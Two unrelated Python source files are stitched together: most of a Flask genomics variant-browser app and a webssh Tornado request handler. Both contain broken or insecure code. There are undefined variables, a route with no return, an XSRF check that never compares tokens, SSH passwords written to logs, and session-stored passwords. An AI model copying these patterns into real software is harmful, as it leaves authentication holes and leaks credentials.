print('hpo_patients',hpo_patients,)
#rsession=get_R_session()
#variants=rsession.r.common_variants(hpo_patients)
variants=[]
print('common variants', variants)
if type(variants) is str:
variants=[variants]
else:
variants=variants.tolist()
print('num of common variants',len(variants),)
res=jsonify(result=variants)
return res
# AJAX
# fetches variant record from db
@app.route('/fetch_variant',methods=['GET','POST'])
def fetch_variant():
if request.method=='POST':
variants=request.form['variants'].strip().split(',')
else:
variants=request.args.get('variants').strip().split(',')
db=get_db()
req_len=len(variants)
variant_ids=map(lambda x: x.replace('_','-'),variants)
variants=[v for v in db.variants.find({'variant_id':{'$in':variant_ids}}, fields={'_id': False})]
ans_len=len(variants)
print(req_len==ans_len)
res=jsonify(result=variants)
return res
# AJAX
# fetches information from db
@app.route('/variant_count',methods=['GET','POST'])
def variant_count():
if request.method=='POST':
external_id=request.form['external_id'].strip()
else:
external_id=request.args.get('external_id').strip()
#rsession=get_R_session()
#res=jsonify(result={'variant_count':rsession.eval('sum(as.logical(variants[["%s"]]))' % external_id) , 'external_id':external_id})
#return res
# AJAX
# fetches information from db
@app.route('/private_variant_count',methods=['GET','POST'])
def private_variant_count():
if request.method=='POST':
external_id=request.form['external_id'].strip()
else:
external_id=request.args.get('external_id').strip()
db=get_db('patients')
p=db.patients.find_one({'external_id':external_id})
if 'PRIVATE_MUT' not in p: private_variant_count=0
else: private_variant_count=len(p['PRIVATE_MUT'])
res=jsonify(result={'variant_count': private_variant_count, 'external_id':external_id})
return res
@app.route('/mim/<mim_id>')
def mim_page(mim_id):
db=get_db('patients')
print(str(mim_id))
patients=[p for p in db.patients.find( { 'features': {'$elemMatch':{'id':str(hpo_id)}} } )]
patient_ids=[p['external_id'] for p in patients]
print(phizz.query_disease([hpo_id]))
print(len([v['VARIANT_ID'] for v in db.variants.find({'HET' : { '$in': patient_ids }})]))
print(len([v['VARIANT_ID'] for v in db.variants.find({'HOM' : { '$in': patient_ids }})]))
return render_template('test.html')
@app.route('/patient/<patient_id>')
def patient_page(patient_id):
db=get_db()
patients=[p for p in db.patients.find({'external_id': str(patient_id)})]
print(patients)
return None
@app.route('/Exomiser/<path:path>')
@requires_auth
def exomiser_page(path):
#is this user authorized to see this patient?
return send_from_directory('Exomiser', path)
@app.route('/example/')
@requires_auth
def example():
return send_from_directory('templates', 'temp-plot.html')
@app.route('/transcript2/<transcript_id>')
def transcript_page2(transcript_id):
db = get_db()
try:
transcript = lookups.get_transcript(db, transcript_id)
cache_key = 't-transcript-{}'.format(transcript_id)
t = cache.get(cache_key)
print 'Rendering %stranscript: %s' % ('' if t is None else 'cached ', transcript_id)
if t is None:
gene = lookups.get_gene(db, transcript['gene_id'])
gene['transcripts'] = lookups.get_transcripts_in_gene(db, transcript['gene_id'])
variants_in_transcript = lookups.get_variants_in_transcript(db, transcript_id)
coverage_stats = lookups.get_coverage_for_transcript(db, transcript['xstart'] - EXON_PADDING, transcript['xstop'] + EXON_PADDING)
add_transcript_coordinate_to_variants(db, variants_in_transcript, transcript_id)
t = render_template(
'transcript.html',
transcript=transcript,
transcript_json=json.dumps(transcript),
variants_in_transcript=variants_in_transcript,
variants_in_transcript_json=json.dumps(variants_in_transcript),
coverage_stats=coverage_stats,
coverage_stats_json=json.dumps(coverage_stats),
gene=gene,
gene_json=json.dumps(gene),
csq_order=csq_order,
)
cache.set(cache_key, t)
return t
except Exception, e:
print 'Failed on transcript:', transcript_id, ';Error=', traceback.format_exc()
abort(404)
@app.route('/transcript/<transcript_id>')
def transcript_page(transcript_id):
db = get_db()
transcript = lookups.get_transcript(db, transcript_id)
cache_key = 't-transcript-{}'.format(transcript_id)
t = cache.get(cache_key)
print 'Rendering %stranscript: %s' % ('' if t is None else 'cached ', transcript_id)
if t: return t
variants=[v for v in db.variants.find({'Transcript':str(transcript_id)})]
genes=list(set([variants['Gene'] for v in variants]))
print(genes)
cache.set(cache_key, t)
return t
@app.route('/region/<region_id>')
def region_page(region_id):
db = get_db()
try:
region = region_id.split('-')
cache_key = 't-region-{}'.format(region_id)
t = cache.get(cache_key)
print 'Rendering %sregion: %s' % ('' if t is None else 'cached ', region_id)
if t is None:
chrom = region[0]
start = None
stop = None
if len(region) == 3:
chrom, start, stop = region
start = int(start)
stop = int(stop)
if start is None or stop - start > REGION_LIMIT or stop < start:
return render_template(
'region.html',
genes_in_region=None,
variants_in_region=None,
chrom=chrom,
start=start,
stop=stop,
coverage=None,
csq_order=csq_order,
)
if start == stop:
start -= 20
stop += 20
genes_in_region = lookups.get_genes_in_region(db, chrom, start, stop)
variants_in_region = lookups.get_variants_in_region(db, chrom, start, stop)
xstart = get_xpos(chrom, start)
xstop = get_xpos(chrom, stop)
coverage_array = lookups.get_coverage_for_bases(db, xstart, xstop)
t = render_template(
'region.html',
genes_in_region=genes_in_region,
variants_in_region=variants_in_region,
chrom=chrom,
start=start,
stop=stop,
coverage=coverage_array,
csq_order=csq_order,
)
cache.set(cache_key, t)
return t
except Exception, e:
print 'Failed on region:', region_id, ';Error=', traceback.format_exc()
abort(404)
@app.route('/dbsnp/<rsid>')
def dbsnp_page(rsid):
db = get_db()
try:
variants = lookups.get_variants_by_rsid(db, rsid)
chrom = None
start = None
stop = None
print 'Rendering rsid: %s' % rsid
return render_template(
'region.html',
rsid=rsid,
variants_in_region=variants,
chrom=chrom,
start=start,
stop=stop,
coverage=None,
genes_in_region=None,
csq_order=csq_order,
)
except Exception, e:
print 'Failed on rsid:', rsid, ';Error=', traceback.format_exc()
abort(404)
@app.route('/not_found/<query>')
def not_found_page(query):
return render_template(
'not_found.html',
query=query
)
@app.route('/error/<query>')
@app.errorhandler(404)
def error_page(query):
return render_template(
'error.html',
query=query
)
@app.route('/downloads')
def downloads_page():
return render_template('downloads.html')
@app.route('/about')
def about_page():
return render_template('about.html')
@app.route('/participants')
def participants_page():
return render_template('about.html')
@app.route('/terms')
def terms_page():
return render_template('terms.html')
@app.route('/contact')
def contact_page():
return render_template('contact.html')
@app.route('/faq')
def faq_page():
return render_template('faq.html')
@app.route('/samples')
def samples_page():
samples=pandas.read_csv('/slms/UGI/vm_exports/vyp/phenotips/HPO/hpo.txt')
return render_template('samples.html',samples=samples.to_html(escape=False))
@app.route('/text')
def text_page():
db = get_db()
query = request.args.get('text')
datatype, identifier = lookups.get_awesomebar_result(db, query)
if datatype in ['gene', 'transcript']:
gene = lookups.get_gene(db, identifier)
link = "http://genome.ucsc.edu/cgi-bin/hgTracks?db=hg19&position=chr%(chrom)s%%3A%(start)s-%(stop)s" % gene
output = '''Searched for %s. Found %s.
%s; Canonical: %s.
%s''' % (query, identifier, gene['full_gene_name'], gene['canonical_transcript'], link)
output += '' if 'omim_accession' not in gene else '''
In OMIM: %(omim_description)s
http://omim.org/entry/%(omim_accession)s''' % gene
return output
elif datatype == 'error' or datatype == 'not_found':
return "Gene/transcript %s not found" % query
else:
return "Search types other than gene transcript not yet supported"
@app.route('/read_viz/<path:path>')
def read_viz_files(path):
full_path = os.path.abspath(os.path.join(app.config["READ_VIZ_DIR"], path))
# security check - only files under READ_VIZ_DIR should be accsessible
if not full_path.startswith(app.config["READ_VIZ_DIR"]):
return "Invalid path: %s" % path
logging.info("path: " + full_path)
# handle igv.js Range header which it uses to request a subset of a .bam
range_header = request.headers.get('Range', None)
if not range_header:
return send_from_directory(app.config["READ_VIZ_DIR"], path)
m = re.search('(\d+)-(\d*)', range_header)
if not m:
error_msg = "ERROR: unexpected range header syntax: %s" % range_header
logging.error(error_msg)
return error_msg
size = os.path.getsize(full_path)
offset = int(m.group(1))
length = int(m.group(2) or size) - offset
data = None
with open(full_path, 'rb') as f:
f.seek(offset)
data = f.read(length)
rv = Response(data, 206, mimetype="application/octet-stream", direct_passthrough=True)
rv.headers.add('Content-Range', 'bytes {0}-{1}/{2}'.format(offset, offset + length - 1, size))
logging.info("GET range request: %s-%s %s" % (m.group(1), m.group(2), full_path))
return rv
@app.after_request
def apply_caching(response):
# prevent click-jacking vulnerability identified by BITs
response.headers["X-Frame-Options"] = "SAMEORIGIN"
return response
### all the mongodb reading/writing code
def load_db():
"""
Load the database
"""
# Initialize database
# Don't need to explicitly create tables with mongo, just indices
confirm = raw_input('This will drop the database and reload. Are you sure you want to continue? [no] ')
if not confirm.startswith('y'):
print('Exiting...')
sys.exit(1)
all_procs = []
for load_function in [load_variants_file, load_dbsnp_file, load_base_coverage, load_gene_models, load_constraint_information]:
procs = load_function()
all_procs.extend(procs)
print("Started %s processes to run %s" % (len(procs), load_function.__name__))
[p.join() for p in all_procs]
print('Done! Loading MNPs...')
load_mnps()
print('Done! Creating cache...')
#create_cache()
print('Done!')
def load_base_coverage():
""" """
def load_coverage(coverage_files, i, n, db):
coverage_generator = parse_tabix_file_subset(coverage_files, i, n, get_base_coverage_from_file)
try:
db.base_coverage.insert(coverage_generator, w=0)
except pymongo.errors.InvalidOperation, e:
print(e)
# handle error when coverage_generator is empty
pass
db = get_db()
db.base_coverage.drop()
print("Dropped db.base_coverage")
# load coverage first; variant info will depend on coverage
db.base_coverage.ensure_index('xpos')
procs = []
coverage_files = app.config['BASE_COVERAGE_FILES']
num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
random.shuffle(app.config['BASE_COVERAGE_FILES'])
for i in range(num_procs):
p = Process(target=load_coverage, args=(coverage_files, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading coverage. Took %s seconds' % int(time.time() - start_time)
def load_variants_file():
def load_variants(sites_file, i, n, db):
for f in sites_file:
print(f)
variants_generator = parse_tabix_file_subset([f], i, n, get_variants_from_sites_vcf)
try:
db.variants.insert(variants_generator, w=0)
except pymongo.errors.InvalidOperation:
pass # handle error when variant_generator is empty
db = get_db('exac')
db.variants.drop()
print("Dropped db.variants")
# grab variants from sites VCF
db.variants.ensure_index('xpos')
db.variants.ensure_index('xstart')
db.variants.ensure_index('xstop')
db.variants.ensure_index('rsid')
db.variants.ensure_index('genes')
db.variants.ensure_index('transcripts')
db.variants.ensure_index('variant_id')
#sites_vcfs = app.config['SITES_VCFS']
sites_vcfs=['/slms/UGI/vm_exports/vyp/phenotips/ExAC/0.3.1/ExAC.r0.3.1.sites.vep.vcf.gz']
print(sites_vcfs)
#if len(sites_vcfs) > 1: raise Exception("More than one sites vcf file found: %s" % sites_vcfs)
procs = []
num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
#pdb.set_trace()
for i in range(num_procs):
p = Process(target=load_variants, args=(sites_vcfs, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading variants. Took %s seconds' % int(time.time() - start_time)
def load_constraint_information():
db = get_db()
db.constraint.drop()
print 'Dropped db.constraint.'
start_time = time.time()
with gzip.open(app.config['CONSTRAINT_FILE']) as constraint_file:
for transcript in get_constraint_information(constraint_file):
db.constraint.insert(transcript, w=0)
db.constraint.ensure_index('transcript')
print 'Done loading constraint info. Took %s seconds' % int(time.time() - start_time)
def load_mnps():
db = get_db()
start_time = time.time()
db.variants.ensure_index('has_mnp')
print 'Done indexing.'
while db.variants.find_and_modify({'has_mnp' : True}, {'$unset': {'has_mnp': '', 'mnps': ''}}): pass
print 'Deleted MNP data.'
with gzip.open(app.config['MNP_FILE']) as mnp_file:
for mnp in get_mnp_data(mnp_file):
variant = lookups.get_raw_variant(db, mnp['xpos'], mnp['ref'], mnp['alt'], True)
db.variants.find_and_modify({'_id': variant['_id']}, {'$set': {'has_mnp': True}, '$push': {'mnps': mnp}}, w=0)
db.variants.ensure_index('has_mnp')
print 'Done loading MNP info. Took %s seconds' % int(time.time() - start_time)
def load_gene_models():
db = get_db()
db.genes.drop()
db.transcripts.drop()
db.exons.drop()
print 'Dropped db.genes, db.transcripts, and db.exons.'
start_time = time.time()
canonical_transcripts = {}
with gzip.open(app.config['CANONICAL_TRANSCRIPT_FILE']) as canonical_transcript_file:
for gene, transcript in get_canonical_transcripts(canonical_transcript_file):
canonical_transcripts[gene] = transcript
omim_annotations = {}
with gzip.open(app.config['OMIM_FILE']) as omim_file:
for fields in get_omim_associations(omim_file):
if fields is None:
continue
gene, transcript, accession, description = fields
omim_annotations[gene] = (accession, description)
dbnsfp_info = {}
with gzip.open(app.config['DBNSFP_FILE']) as dbnsfp_file:
for dbnsfp_gene in get_dbnsfp_info(dbnsfp_file):
other_names = [other_name.upper() for other_name in dbnsfp_gene['gene_other_names']]
dbnsfp_info[dbnsfp_gene['ensembl_gene']] = (dbnsfp_gene['gene_full_name'], other_names)
print 'Done loading metadata. Took %s seconds' % int(time.time() - start_time)
# grab genes from GTF
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
for gene in get_genes_from_gencode_gtf(gtf_file):
gene_id = gene['gene_id']
if gene_id in canonical_transcripts:
gene['canonical_transcript'] = canonical_transcripts[gene_id]
if gene_id in omim_annotations:
gene['omim_accession'] = omim_annotations[gene_id][0]
gene['omim_description'] = omim_annotations[gene_id][1]
if gene_id in dbnsfp_info:
gene['full_gene_name'] = dbnsfp_info[gene_id][0]
gene['other_names'] = dbnsfp_info[gene_id][1]
db.genes.insert(gene, w=0)
print 'Done loading genes. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.genes.ensure_index('gene_id')
db.genes.ensure_index('gene_name_upper')
db.genes.ensure_index('gene_name')
db.genes.ensure_index('other_names')
db.genes.ensure_index('xstart')
db.genes.ensure_index('xstop')
print 'Done indexing gene table. Took %s seconds' % int(time.time() - start_time)
# and now transcripts
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
db.transcripts.insert((transcript for transcript in get_transcripts_from_gencode_gtf(gtf_file)), w=0)
print 'Done loading transcripts. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.transcripts.ensure_index('transcript_id')
db.transcripts.ensure_index('gene_id')
print 'Done indexing transcript table. Took %s seconds' % int(time.time() - start_time)
# Building up gene definitions
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
db.exons.insert((exon for exon in get_exons_from_gencode_gtf(gtf_file)), w=0)
print 'Done loading exons. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.exons.ensure_index('exon_id')
db.exons.ensure_index('transcript_id')
db.exons.ensure_index('gene_id')
print 'Done indexing exon table. Took %s seconds' % int(time.time() - start_time)
return []
def load_dbsnp_file():
db = get_db()
def load_dbsnp(dbsnp_file, i, n, db):
if os.path.isfile(dbsnp_file + ".tbi"):
dbsnp_record_generator = parse_tabix_file_subset([dbsnp_file], i, n, get_snp_from_dbsnp_file)
try:
db.dbsnp.insert(dbsnp_record_generator, w=0)
except pymongo.errors.InvalidOperation:
pass # handle error when coverage_generator is empty
else:
with gzip.open(dbsnp_file) as f:
db.dbsnp.insert((snp for snp in get_snp_from_dbsnp_file(f)), w=0)
db.dbsnp.drop()
db.dbsnp.ensure_index('rsid')
db.dbsnp.ensure_index('xpos')
start_time = time.time()
dbsnp_file = app.config['DBSNP_FILE']
print "Loading dbsnp from %s" % dbsnp_file
if os.path.isfile(dbsnp_file + ".tbi"): num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
else:
# see if non-tabixed .gz version exists
if os.path.isfile(dbsnp_file):
print(("WARNING: %(dbsnp_file)s.tbi index file not found. Will use single thread to load dbsnp."
"To create a tabix-indexed dbsnp file based on UCSC dbsnp, do: \n"
" wget http://hgdownload.soe.ucsc.edu/goldenPath/hg19/database/snp141.txt.gz \n"
" gzcat snp141.txt.gz | cut -f 1-5 | bgzip -c > snp141.txt.bgz \n"
" tabix -0 -s 2 -b 3 -e 4 snp141.txt.bgz") % locals())
num_procs = 1
else:
raise Exception("dbsnp file %s(dbsnp_file)s not found." % locals())
procs = []
for i in range(num_procs):
p = Process(target=load_dbsnp, args=(dbsnp_file, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading dbSNP. Took %s seconds' % int(time.time() - start_time)
#start_time = time.time()
#db.dbsnp.ensure_index('rsid')
#print 'Done indexing dbSNP table. Took %s seconds' % int(time.time() - start_time)
"""
Get the most recent common ancestor between two sets of hpo terms.
"""
def mrc_hpo():
hpo_graph=get_hpo_graph()
db=get_db()
for var in db.variants.find():
hpo_anc=[]
for eid in list(set(var['HET']+var['HOM'])):
patient=db.patients.find_one({'external_id':eid})
if not patient: continue
if 'features' not in patient: continue
for f in patient['features']:
fid=f['id']
if not fid.startswith('HP'): continue
hpo_anc.append(set(hpo_graph.get_ancestors(fid)))
if not hpo_anc: continue
if 'SYMBOL' not in var: continue
var['ALL_HPO']=list(set(set.union(*hpo_anc)))
var['SHARED_HPO']=list(set.intersection(*hpo_anc))
print(var['VARIANT_ID'],var['SYMBOL'],len(var['HET']+var['HOM']),var['SHARED_HPO'],var['ALL_HPO'])
db.variants.update({'VARIANT_ID':var['VARIANT_ID']},var,upsert=True)
#progressbar
'''
{
'random_p_id':{
'total':456,
'count':123,
'status':['running','done']
},
...
}
'''
PROGRESS_BAR = {}
'''
initiate a progress instance
arg: total length of genes
return: progress_id
'''
def init_progress_bar(id,length):
# check id
if id in PROGRESS_BAR:
if PROGRESS_BAR[id]['status'] != 'done':
return 'the id already exists in PROGRESS_BAR'
# initialise progress_bar
PROGRESS_BAR[id] = {
'total': length,
'count':0,
'message': '',
'status':'running'
}
return 0
'''
update progress
arg: {
id: id,
message: message,
step: 1
}
default step 1
'''
def update_progress_bar(obj):
# check if id in PROGRESS_BAR
if not obj['id'] in PROGRESS_BAR:
return 'ID does not exist in PROGRESS_BAR'
# update progress
if not 'step' in obj:
obj['step'] = 1
PROGRESS_BAR[obj['id']]['count'] += obj['step']
PROGRESS_BAR[obj['id']]['message'] = obj['message']
# done?
if PROGRESS_BAR[obj['id']]['count'] == PROGRESS_BAR[obj['id']]['total']:
PROGRESS_BAR[obj['id']]['status'] = 'done'
'''
kill a progress
'''
def kill_progress_bar(key):
if key in PROGRESS_BAR:
del PROGRESS_BAR[key]
'''
to check if an iterable is empty
'''
def peek(iterable):
try:
first = next(iterable)
except RuntimeError:
return None
except StopIteration:
return None
return first, itertools.chain([first], iterable)
'''
find the freaking PID, Title or Abstract no matter what!
'''
def find_item(obj, key):
if key in obj:
return obj[key]
if isinstance(obj, dict):
for k in obj:
if isinstance(obj[k], dict):
item = find_item(obj[k], key)
if item is not None:
return item
elif isinstance(obj[k], list):
for i in obj[k]:
if isinstance(i, str):
continue
item = find_item(i, key)
if item is not None:
return item
elif isinstance(obj, list):
for k in obj:
if isinstance(k, dict):
item = find_item(k, key)
if item is not None:
return item
elif isinstance(k, list):
for i in k:
if isinstance(i, str):
continue
item = find_item(i, key)
if item is not None:
return item
"""
for pubmedBatch
check title and abstract is truely relevant. Assign to both this gene and each ref
"""
def scrutinise(obj):
print obj['smashed_all']
if obj['lag']:
obj['lag'] = obj['lag']/3600/24 # convert it to days
# need to update
search_results = Entrez.read(Entrez.esearch(db='pubmed', term=obj['smashed_all'], reldate=obj['lag'], datetype='pdat', usehistory='y'))
else:
# just search
search_results = Entrez.read(Entrez.esearch(db='pubmed',retmax=50, term=obj['smashed_all'], usehistory='y'))
# now done the search. let's get results
count = int(search_results["Count"])
print count
results = {'results':[], 'total_score':0}
# get search content
attempt = 1
while attempt <= 10:
try:
handle = Entrez.efetch("pubmed",
restart=0,
retmax=50,
retmode="xml",
webenv=search_results['WebEnv'],
query_key=search_results['QueryKey']
)
break
except HTTPError as err:
if 500 <= err.code <= 599:
print('Received error from server %s' % err)
else:
print('Something is wrong while efetch..')
print('Attempt %i of 10' % attempt)
attempt += 1
time.sleep(5)
record = Entrez.parse(handle)
if peek(record):
# got something. let's do some calculation
for r in record:
# calculate score
score = 0
pid = str(find_item(r, 'PMID'))
abstract_list = find_item(r, 'AbstractText')
# parse abstract
abstract = ''
if abstract_list:
for a in abstract_list:
if hasattr(a, 'attributes') and 'Label' in a.attributes:
abstract = abstract + '<b>' + a.attributes['Label'] + ': </b>'
abstract = abstract + a + '<br/>'
else:
abstract = abstract + a
title = find_item(r, 'ArticleTitle')
if title:
score = score + len(obj['reg'].findall(title))
if abstract:
score = score + len(obj['reg'].findall(abstract))
# add result to genes[gene_name]
if score:
results['results'].append({
'id': pid,
'title': title,
'abstract': abstract,
'score': score
})
results['total_score'] = results['total_score'] + score
results['results'] = sorted(results['results'], key=lambda k: k['score'], reverse=True)
return results
def get_pred_score(obj):
# for the batch_pubmed route.
# calculate the pred score
# [D/A].each = 10, [P].each = 5, [C].each = 6, [T/B/N].each = -1. If there is a splicing/insertion/deletion event, the score is set as 1000. Not given is set as 0
# ref: https://github.com/plagnollab/DNASeq_pipeline/blob/master/GATK_v2/filtering.md
pred = 0
if ('Func' in obj and re.search('splic', obj['Func'])) or ('ExonicFunc' in obj and re.search(r'stop|frame|del|insert', obj['ExonicFunc'])):
pred = 1000;
else:
for k in obj:
if re.search('Pred', k):
if obj[k] == 'D' or obj[k] == 'A':
pred = pred + 10
elif obj[k] == 'P':
pred = pred + 5
elif obj[k] == 'C':
pred = pred + 6
elif obj[k] == 'T' or obj[k] == 'B' or obj[k] == 'N':
pred = pred - 1
else:
pass
return pred;
@app.route('/plot/<gene>')
def plot(gene):
#db = get_db()
#var=db.variants.find_one({'VARIANT_ID':'3_8775295_C_T'})
d=csv.DictReader(file('/slms/UGI/vm_exports/vyp/phenotips/CARDIO/assoc_3.csv','r'),delimiter=',')
x=[i for i, r, in enumerate(d)]
d=csv.DictReader(file('/slms/UGI/vm_exports/vyp/phenotips/CARDIO/assoc_3.csv','r'),delimiter=',')
y=[-math.log10(float(r['HCM.chisq.p'])) for r in d]
print(x)
print(y)
d=csv.DictReader(file('/slms/UGI/vm_exports/vyp/phenotips/CARDIO/assoc_3.csv','r'),delimiter=',')
#layout = dict( yaxis = dict( type = 'log', tickvals = [ 1.5, 2.53, 5.99999 ]), xaxis = dict( ticktext = [ "green eggs", "& ham", "H2O", "Gorgonzola" ], tickvals = [ 0, 1, 2, 3, 4, 5 ]))
labels=[r['VARIANT_ID'] for r in d]
layout = Layout( xaxis = dict( ticktext=labels, tickvals=x ), title="p-value plot" )
#Layout( title="p-value plot")
plotly.offline.plot({
"data": [
Scatter(
x=x,
y=y
)
],
"layout": layout
}, filename='genes/%s-pvalues.html' % (gene,), auto_open=False)
return send_from_directory('genes', '%s-pvalues.html' % gene,)
""" JINJA2 filer """
def highlight(text, list, myclass):
# wrap list element in text (case insensitive) with <span>
# note that gene description has to be split by ','
# with class to do highlighting
for l in list:
# remove (.*), escape +?.*
l = re.sub(r'\(.*\)', '', l)
l = re.sub(r'\+','\\+',l)
l = re.sub(r'\?','\\?',l)
l = re.sub(r'\.','\\.',l)
l = re.sub(r'\*','\\*',l)
l = re.sub(r'\[.*\]','',l)
l = re.sub(r'\\', '\\\\',l)
words = l.split(',')
for w in words:
# wrap w with brackets to be a catch group
text = re.sub(r'(\b%s\b)' % w, r'<span class="%s">\1</span>' % myclass, text, flags=re.I)
return text
jinja2.filters.FILTERS['highlight'] = highlight
def highlight2(text, kw, myclass):
# wrap list element in text (case insensitive) with <span>
# note that gene description has to be split by ','
# with class to do highlighting
# remove (.*), escape +?.*
for w in kw:
# wrap w with brackets to be a catch group
text = re.sub(r'(%s)'%w, r'<span class="%s">\1</span>' % myclass, text, flags=re.I)
return text
jinja2.filters.FILTERS['highlight2'] = highlight2
@app.route('/load_individual/<individual>')
@requires_auth
def load_individual(individual):
patient = get_db().patients.find_one({'external_id':individual})
if 'rare_variants' in patient and type(patient['rare_variants']) is list:
referrer=request.referrer
if referrer:
u = urlparse(referrer)
referrer='%s://%s' % (u.scheme,u.hostname,)
if u.port: referrer='%s:%s' % (referrer,u.port,)
else:
referrer=''
url=referrer+'/individual/'+individual
print(url)
return redirect(url)
filename='/slms/UGI/vm_exports/vyp/phenotips/DROPBOX/rare_variants/%s.csv' % individual
if not os.path.isfile(filename): return '%s not found!' % filename
auth='%s:%s' % (session['user'],session['password2'],)
p = Process(target=load_patient, args=(filename,auth))
p.start()
return 'Loading %s...' % individual
import views.uclex_gene
import views.uclex_irdc
import views.gene
import views.variant
import views.individual
import views.pubmedbatch
import views.igv
|
handler.py
|
import io
import json
import logging
import socket
import struct
import threading
import traceback
import weakref
import paramiko
import tornado.web
import requests
import sys
from tornado.ioloop import IOLoop
from tornado.util import basestring_type
from webssh.worker import Worker, recycle_worker, workers
from tornado.web import HTTPError
from tornado.options import options
from webssh.policy import user_auth, jwt_encode, authenticated
from webssh.conf import cmdb_api, cmdb_headers
from webssh.conf import delay as DELAY
try:
from concurrent.futures import Future
except ImportError:
from tornado.concurrent import Future
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
def parse_encoding(data):
for line in data.split('\n'):
s = line.split('=')[-1]
if s:
return s.strip('"').split('.')[-1]
class MixinHandler(object):
def get_real_client_addr(self):
ip = self.request.headers.get('X-Real-Ip')
port = self.request.headers.get('X-Real-Port')
if ip is None and port is None:
return
try:
port = int(port)
except (TypeError, ValueError):
pass
else:
if ip: # does not validate ip and port here
return (ip, port)
logging.warning('Bad nginx configuration.')
return False
class MixinRequestHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", options.allow_origin)
self.set_header("Access-Control-Allow-Headers", options.allow_headers)
self.set_header("Access-Control-Allow-Methods", "POST, GET, OPTIONS")
self.set_header("Request-Id", self.settings['request_id'])
def check_xsrf_cookie(self):
token = (self.get_argument("_xsrf", None) or
self.request.headers.get("X-Xsrftoken") or
self.request.headers.get("X-Csrftoken"))
if not token:
raise HTTPError(403, "'_xsrf' argument missing from POST")
_, token, _ = self._decode_xsrf_token(token)
_, expected_token, _ = self._get_raw_xsrf_token()
if not token:
raise HTTPError(403, "'_xsrf' argument has invalid format")
def is_ajax(self):
if "application/json" in self.request.headers._as_list["Content-Type"][0]:
return True
return False
def _request_summary(self):
return "[{0}] [{1}] [{2}] [request-id:{3}]".format(
self.request.method, self.request.uri,
self.request.remote_ip, self.settings['request_id']
)
class IndexHandler(MixinHandler, MixinRequestHandler):
def initialize(self, loop, policy, host_keys_settings):
self.loop = loop
self.policy = policy
self.host_keys_settings = host_keys_settings
def get_argument(self, name, default=object, strip=True):
"""Returns the value of the argument with the given name.
If default is not provided, the argument is considered to be
required, and we raise a `MissingArgumentError` if it is missing.
If the argument appears in the url more than once, we return the
last value.
The returned value is always unicode.
"""
if hasattr(self.request, "body_json"):
return self.request.body_json[name]
return self._get_argument(name, default, self.request.arguments, strip)
def get_privatekey(self):
try:
data = self.request.files.get('privatekey')[0]['body']
return data.decode('utf-8')
except Exception:
data = None
if not data:
try:
data = self.request.body_json["privatekey"]
if sys.version_info > (2,):
return data
except Exception:
return
@classmethod
def get_specific_pkey(cls, pkeycls, privatekey, password):
logging.info('Trying {0}'.format(pkeycls.__name__,))
try:
pkey = pkeycls.from_private_key(io.StringIO(privatekey),
password=password)
except paramiko.PasswordRequiredException:
raise ValueError('Need password to decrypt the private key.')
except paramiko.SSHException:
pass
else:
return pkey
@classmethod
def get_pkey_obj(cls, privatekey, password):
password = password.encode('utf-8') if password else None
pkey = cls.get_specific_pkey(paramiko.RSAKey, privatekey, password)\
or cls.get_specific_pkey(paramiko.DSSKey, privatekey, password)\
or cls.get_specific_pkey(paramiko.ECDSAKey, privatekey, password)\
or cls.get_specific_pkey(paramiko.Ed25519Key, privatekey,
password)
if not pkey:
raise ValueError('Not a valid private key file or '
'wrong password for decrypting the private key')
return pkey
def get_port(self):
value = self.get_value('port')
try:
port = int(value)
except ValueError:
port = 0
if 0 < port < 65536:
return port
raise ValueError('Invalid port {0}, Request-ID:{1}'.format(value, self.settings['request_id']))
def get_value(self, name):
value = self.get_argument(name)
if not value:
raise ValueError('Empty {}, Request-ID:{0}'.format(name, self.settings['request_id']))
return value
def get_args(self):
hostname = self.get_value('hostname')
port = self.get_port()
username = self.get_value('username')
password = self.get_argument('password')
privatekey = self.get_privatekey()
pkey = self.get_pkey_obj(privatekey, password) if privatekey else None
if pkey:
args = (hostname, port, username, password, pkey)
else:
args = (hostname, port, username, password)
logging.info('host info: {0}, Request-ID: {1}'.format(args, self.settings['request_id']))
return args
def get_client_addr(self):
return self.get_real_client_addr() or self.request.connection.stream.\
socket.getpeername()
def get_default_encoding(self, ssh):
try:
_, stdout, _ = ssh.exec_command('locale')
except paramiko.SSHException:
result = None
else:
data = stdout.read().decode()
result = parse_encoding(data)
return result if result else 'utf-8'
def ssh_connect(self):
ssh = paramiko.SSHClient()
ssh._system_host_keys = self.host_keys_settings['system_host_keys']
ssh._host_keys = self.host_keys_settings['host_keys']
ssh._host_keys_filename = self.host_keys_settings['host_keys_filename']
ssh.set_missing_host_key_policy(self.policy)
if self.is_ajax():
try:
self.get_host_info()
except Exception as e:
raise ValueError('for cmdb get host error: {0}, Request-ID: {1}'.format(e, self.settings['request_id']))
args = self.get_args()
dst_addr = (args[0], args[1])
logging.info('Connecting to {}:{}, Request-ID: {}'.format(dst_addr[0], dst_addr[1], self.settings['request_id']))
try:
ssh.connect(*args, timeout=6)
except socket.error:
raise ValueError('Unable to connect to {}:{}, Request-ID: {}'.format(dst_addr[0], dst_addr[1], self.settings['request_id']))
except paramiko.BadAuthenticationType:
raise ValueError('SSH authentication failed. Request-ID: {}'.format(self.settings['request_id']))
except paramiko.BadHostKeyException:
raise ValueError('Bad host key. Request-ID: {}'.format(self.settings['request_id']))
chan = ssh.invoke_shell(term='xterm')
chan.setblocking(0)
worker = Worker(self.loop, ssh, chan, dst_addr)
worker.src_addr = self.get_client_addr()
worker.encoding = self.get_default_encoding(ssh)
return worker
def ssh_connect_wrapped(self, future):
try:
worker = self.ssh_connect()
except Exception as exc:
logging.error(traceback.format_exc())
future.set_exception(exc)
else:
future.set_result(worker)
def options(self, *args, **kwargs):
self.write('success')
